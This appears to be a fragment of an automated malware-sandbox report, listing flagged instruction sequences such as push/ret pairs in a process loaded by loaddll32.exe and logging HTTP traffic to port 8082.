Code function: 0_3_00CE0766 push ecx; ret |
0_3_00CE0770 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0774 push ecx; ret |
0_3_00CE077F |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE68E7 push esp; ret |
0_3_00CE68EF |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE18A6 push FFFFFFC2h; ret |
0_3_00CE1891 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE1867 push FFFFFFC2h; ret |
0_3_00CE1891 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE087E push edx; ret |
0_3_00CE0887 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0834 push edx; ret |
0_3_00CE0853 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0972 push ebx; ret |
0_3_00CE0978 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0917 push edx; ret |
0_3_00CE091D |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE9ADA push FFFFFFC3h; ret |
0_3_00CE9AF9 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE1A91 pushad ; iretd |
0_3_00CE1A93 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE1A7D pushad ; retf |
0_3_00CE1A86 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE4B84 push ebx; ret |
0_3_00CE4B85 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49685 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49685 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49686 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49686 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49687 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49687 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49688 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49688 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49689 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49689 |